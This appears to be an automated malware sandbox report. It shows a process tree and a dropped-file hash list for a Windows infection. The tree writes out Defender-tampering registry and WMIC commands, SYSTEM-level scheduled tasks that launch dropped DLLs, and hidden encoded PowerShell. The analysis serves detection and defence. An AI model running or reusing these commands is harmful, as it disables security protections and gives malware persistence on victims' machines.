                                                                                                                    schtasks /run /I /tn "gnQdJQNcu"
                                                                                                                    2⤵
                                                                                                                      PID:4364
                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      schtasks /DELETE /F /TN "gnQdJQNcu"
                                                                                                                      2⤵
                                                                                                                        PID:5476
                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                        schtasks /CREATE /TN "XvjVthUohNRwdLXcW" /SC once /ST 02:04:33 /RU "SYSTEM" /TR "\"C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TgjcqZd.exe\" Zb /NLjwdidca 385104 /S" /V1 /F
                                                                                                                        2⤵
                                                                                                                        • Drops file in Windows directory
                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                        PID:6008
                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                        schtasks /run /I /tn "XvjVthUohNRwdLXcW"
                                                                                                                        2⤵
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:5544
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 840
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        PID:5932
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:2884
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                      1⤵
                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Identifies Wine through registry keys
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:5204
                                                                                                                    • C:\ProgramData\gdbh\oliwkab.exe
                                                                                                                      C:\ProgramData\gdbh\oliwkab.exe
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:4596
                                                                                                                      • C:\ProgramData\gdbh\oliwkab.exe
                                                                                                                        "C:\ProgramData\gdbh\oliwkab.exe"
                                                                                                                        2⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:4388
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                      1⤵
                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                      PID:1540
                                                                                                                      • C:\Windows\system32\gpupdate.exe
                                                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                        2⤵
                                                                                                                          PID:1420
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                        1⤵
                                                                                                                          PID:5968
                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                          1⤵
                                                                                                                            PID:5056
                                                                                                                          • C:\Windows\system32\gpscript.exe
                                                                                                                            gpscript.exe /RefreshSystemParam
                                                                                                                            1⤵
                                                                                                                              PID:5408
                                                                                                                            • C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TgjcqZd.exe
                                                                                                                              C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TgjcqZd.exe Zb /NLjwdidca 385104 /S
                                                                                                                              1⤵
                                                                                                                              • Checks computer location settings
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Drops Chrome extension
                                                                                                                              • Drops file in System32 directory
                                                                                                                              • Drops file in Program Files directory
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                              PID:1684
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                2⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:2836
                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                  3⤵
                                                                                                                                  • Indirect Command Execution
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:5640
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                    4⤵
                                                                                                                                      PID:4996
                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                        5⤵
                                                                                                                                          PID:2176
                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                      3⤵
                                                                                                                                      • Indirect Command Execution
                                                                                                                                      PID:5576
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                        4⤵
                                                                                                                                          PID:1768
                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                            5⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:5244
                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                        3⤵
                                                                                                                                        • Indirect Command Execution
                                                                                                                                        PID:2180
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                          4⤵
                                                                                                                                            PID:676
                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                              5⤵
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:4808
                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                          3⤵
                                                                                                                                          • Indirect Command Execution
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:2308
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                            4⤵
                                                                                                                                              PID:1620
                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                5⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:2320
                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                            3⤵
                                                                                                                                            • Indirect Command Execution
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:2788
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                              4⤵
                                                                                                                                                PID:1484
                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                  5⤵
                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                  PID:5628
                                                                                                                                                  • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                    6⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:4220
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /DELETE /F /TN "bPUvzXzfJRZdhTmsKY"
                                                                                                                                            2⤵
                                                                                                                                              PID:4688
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                                                              2⤵
                                                                                                                                                PID:5372
                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                  forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                  3⤵
                                                                                                                                                  • Indirect Command Execution
                                                                                                                                                  PID:2372
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                    4⤵
                                                                                                                                                      PID:3620
                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                        5⤵
                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                        PID:4840
                                                                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                          6⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:4376
                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\xFHhRZnoU\XOEpcA.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "XsUoLYLFLViNzfg" /V1 /F
                                                                                                                                                  2⤵
                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                  PID:5032
                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  schtasks /CREATE /TN "XsUoLYLFLViNzfg2" /F /xml "C:\Program Files (x86)\xFHhRZnoU\ENztkMb.xml" /RU "SYSTEM"
                                                                                                                                                  2⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                  PID:4776
                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  schtasks /END /TN "XsUoLYLFLViNzfg"
                                                                                                                                                  2⤵
                                                                                                                                                    PID:4124
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /DELETE /F /TN "XsUoLYLFLViNzfg"
                                                                                                                                                    2⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:3580
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /CREATE /TN "eyGGyOHdjwiqlD" /F /xml "C:\Program Files (x86)\sozrmRSxWUyU2\SLxNWWp.xml" /RU "SYSTEM"
                                                                                                                                                    2⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                    PID:5896
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /CREATE /TN "VKJwmMxrkHdhL2" /F /xml "C:\ProgramData\asFrGLUBkJEUSBVB\eFvFSsV.xml" /RU "SYSTEM"
                                                                                                                                                    2⤵
                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                    PID:5384
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /CREATE /TN "vxuXxyFztdpxLKnuT2" /F /xml "C:\Program Files (x86)\cBfgrRECHDYJtCCxauR\AEEGyAa.xml" /RU "SYSTEM"
                                                                                                                                                    2⤵
                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                    PID:4296
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /CREATE /TN "EVkLelvmHIdQmzlozMv2" /F /xml "C:\Program Files (x86)\IfTYFdYohdhRC\QSTEqSX.xml" /RU "SYSTEM"
                                                                                                                                                    2⤵
                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                    PID:1008
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /CREATE /TN "MVgJbjSzRhzvgPnkP" /SC once /ST 06:21:18 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\gXItsKzEGiJHAsry\XjxvNjSc\nQQFsAl.dll\",#1 /cdideiN 385104" /V1 /F
                                                                                                                                                    2⤵
                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                    PID:4556
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /run /I /tn "MVgJbjSzRhzvgPnkP"
                                                                                                                                                    2⤵
                                                                                                                                                      PID:5900
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /DELETE /F /TN "XvjVthUohNRwdLXcW"
                                                                                                                                                      2⤵
                                                                                                                                                        PID:3556
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1684 -s 2496
                                                                                                                                                        2⤵
                                                                                                                                                        • Program crash
                                                                                                                                                        PID:5996
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2440 -ip 2440
                                                                                                                                                      1⤵
                                                                                                                                                        PID:936
                                                                                                                                                      • C:\Windows\system32\rundll32.EXE
                                                                                                                                                        C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\gXItsKzEGiJHAsry\XjxvNjSc\nQQFsAl.dll",#1 /cdideiN 385104
                                                                                                                                                        1⤵
                                                                                                                                                          PID:2928
                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\gXItsKzEGiJHAsry\XjxvNjSc\nQQFsAl.dll",#1 /cdideiN 385104
                                                                                                                                                            2⤵
                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                            PID:4844
                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                              schtasks /DELETE /F /TN "MVgJbjSzRhzvgPnkP"
                                                                                                                                                              3⤵
                                                                                                                                                                PID:5736
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5572 -ip 5572
                                                                                                                                                            1⤵
                                                                                                                                                              PID:4004
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1684 -ip 1684
                                                                                                                                                              1⤵
                                                                                                                                                                PID:5544

                                                                                                                                                              Network

                                                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                                                              Replay Monitor

                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                              Downloads

                                                                                                                                                              • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                                Filesize

                                                                                                                                                                2.5MB

                                                                                                                                                                MD5

                                                                                                                                                                0fa776d1d987328d35aac9f5cdaf498a

                                                                                                                                                                SHA1

                                                                                                                                                                b4787536014fc9cb2fbbdc21e3ff1b8bfd87ba60

                                                                                                                                                                SHA256

                                                                                                                                                                1558576513d1f3c410a0fb2048bba0e2748b73522c33632d638d6f072d8001ae

                                                                                                                                                                SHA512

                                                                                                                                                                3ffb08730271a3d843fa2ec2d5a627e7dc1c5b69050184ef17103ab0fe80189abbd43ff0ba38c0fbe1f035ce0917e0f8276754fb2b4d82e24fe3de384b77c1ff

                                                                                                                                                              • C:\ProgramData\mozglue.dll

                                                                                                                                                                Filesize

                                                                                                                                                                593KB

                                                                                                                                                                MD5

                                                                                                                                                                c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                                                SHA1

                                                                                                                                                                95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                                                SHA256

                                                                                                                                                                ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                                                SHA512

                                                                                                                                                                fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                                              • C:\ProgramData\nss3.dll

                                                                                                                                                                Filesize

                                                                                                                                                                2.0MB

                                                                                                                                                                MD5

                                                                                                                                                                1cc453cdf74f31e4d913ff9c10acdde2

                                                                                                                                                                SHA1

                                                                                                                                                                6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                                                                                                                                SHA256

                                                                                                                                                                ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                                                                                                                                SHA512

                                                                                                                                                                dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                Filesize

                                                                                                                                                                328B

                                                                                                                                                                MD5

                                                                                                                                                                14a96b4ea77f3289427273a10773843d

                                                                                                                                                                SHA1

                                                                                                                                                                8bc045497a68209eb74d8fedfbf0850f6e8ec082

                                                                                                                                                                SHA256

                                                                                                                                                                8c855e45f6dd9046db292871f15250d5fad6f1b28ca6c03fc8c52ae39c0636a8

                                                                                                                                                                SHA512

                                                                                                                                                                0bdd64a988e592c3fb3fde3c1233ea9c488aa9471586b24a07daa92b1fb5333e0ee9b8e694eb52121434e37fbffcd1d20db33b6f7bf481005c01c9af681de962

                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                                                                Filesize

                                                                                                                                                                187B

                                                                                                                                                                MD5

                                                                                                                                                                2a1e12a4811892d95962998e184399d8

                                                                                                                                                                SHA1

                                                                                                                                                                55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                SHA256

                                                                                                                                                                32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                SHA512

                                                                                                                                                                bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                                                                Filesize

                                                                                                                                                                136B

                                                                                                                                                                MD5

                                                                                                                                                                238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                SHA1

                                                                                                                                                                0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                SHA256

                                                                                                                                                                801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                SHA512

                                                                                                                                                                2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                                                                Filesize

                                                                                                                                                                150B

                                                                                                                                                                MD5

                                                                                                                                                                0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                SHA1

                                                                                                                                                                6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                SHA256

                                                                                                                                                                0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                SHA512

                                                                                                                                                                5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                                Filesize

                                                                                                                                                                35KB

                                                                                                                                                                MD5

                                                                                                                                                                d71e3aa2cb49312b24fac43f232e2f0d

                                                                                                                                                                SHA1

                                                                                                                                                                1b9d0cb9a91bfaa940bc49648d4ab7b917fd5dde

                                                                                                                                                                SHA256

                                                                                                                                                                584211901f3ab0829e07ba80a84c443cd8e2fcece41509ebffd2cd4ec3c8c08a

                                                                                                                                                                SHA512

                                                                                                                                                                a18b3d3c7af586fb6d1b61ca392e2650b371408353e49ea4be53b825a043e71d95985a64ea9e675a6292c55cc6072dabea5e3cac4b808ea7374090afb57f8d04

                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                Filesize

                                                                                                                                                                2KB

                                                                                                                                                                MD5

                                                                                                                                                                ac4917a885cf6050b1a483e4bc4d2ea5

                                                                                                                                                                SHA1

                                                                                                                                                                b1c0a9f27bd21c6bbb8e9be70db8777b4a2a640f

                                                                                                                                                                SHA256

                                                                                                                                                                e39062a62c3c7617feeeff95ea8a0be51104a0d36f46e44eea22556fda74d8d9

                                                                                                                                                                SHA512

                                                                                                                                                                092c67a3ecae1d187cad72a8ea1ea37cb78a0cf79c2cd7fb88953e5990669a2e871267015762fd46d274badb88ac0c1d73b00f1df7394d89bed48a3a45c2ba3d

                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

                                                                                                                                                                Filesize

                                                                                                                                                                151B

                                                                                                                                                                MD5

                                                                                                                                                                bd6b60b18aee6aaeb83b35c68fb48d88

                                                                                                                                                                SHA1

                                                                                                                                                                9b977a5fbf606d1104894e025e51ac28b56137c3

                                                                                                                                                                SHA256

                                                                                                                                                                b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

                                                                                                                                                                SHA512

                                                                                                                                                                3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                Filesize

                                                                                                                                                                18KB

                                                                                                                                                                MD5

                                                                                                                                                                688017741dbef5cb465f7e326643ebb3

                                                                                                                                                                SHA1

                                                                                                                                                                0a116340772c12df5250238ce1c3a66ee0887440

                                                                                                                                                                SHA256

                                                                                                                                                                2475f19a77b2b06606f92c0ff2b27edc5d553aaf17e936bda71f59b11f517328

                                                                                                                                                                SHA512

                                                                                                                                                                7593211959259122c6bcb64b0c829f1dbfc7bb1ad8d5d23a05e38df6372795e522b2ae5d9629f2a8f4e63dec77eedb083410b22b4c543736c4167a45db979d21

                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                Filesize

                                                                                                                                                                944B

                                                                                                                                                                MD5

                                                                                                                                                                6344564097353c8e7e68991fffa80d88

                                                                                                                                                                SHA1

                                                                                                                                                                2ac4d108a30ec3fbd2938b0563eb912415ea7c62

                                                                                                                                                                SHA256

                                                                                                                                                                d0af6d69f8bc0c98e9fb61dead6327bbc8b4f5292529313515382d8f883de0da

                                                                                                                                                                SHA512

                                                                                                                                                                e2b37a9001a91cb05483d72f88bd70a61ca5655939c2290fd1580710eec9d8d26a5fedbcb5223f5413b5dcc46f1d8b6b408e57be0e4ad4b37b55cbce9023a303

                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                Filesize

                                                                                                                                                                15KB

                                                                                                                                                                MD5

                                                                                                                                                                5c7bc9756c2c122a83d45165782fefcd

                                                                                                                                                                SHA1

                                                                                                                                                                1fea4178ed60b501cf935d7438b4948a755d0643

                                                                                                                                                                SHA256

                                                                                                                                                                dcb2c569db0beac88f613df8a04fbcd2f1b943de6178325de7325829ac1cded4

                                                                                                                                                                SHA512

                                                                                                                                                                dcfa769f723a137504a1a3f2b9b44fcd5c88b33d85074db31ac18c913e304f262618041cb17a0db091a367fb2390c45012862891849ad2c36e84bc470beb1eb4

                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000002001\GOLD.exe

                                                                                                                                                                Filesize

                                                                                                                                                                954KB

                                                                                                                                                                MD5

                                                                                                                                                                e71c0c5d72455dde6510ba23552d7d2f

                                                                                                                                                                SHA1

                                                                                                                                                                4dff851c07a9f9ebc9e71b7f675cc20b06a2439c

                                                                                                                                                                SHA256

                                                                                                                                                                de1d7fe86a0b70a7a268d2960109833f4d126d5d9e3acb36697e8ff59c56017f

                                                                                                                                                                SHA512

                                                                                                                                                                c6f4b1eb353a554ca49bab5e894a4d7c46e2674d32f2f0d5a9231400d14a9ea5604c079193cd0bed9fea409bb71b5779c0c03671e104cb0740fe8ade3e530ca6

                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe

                                                                                                                                                                Filesize

                                                                                                                                                                1.4MB

                                                                                                                                                                MD5

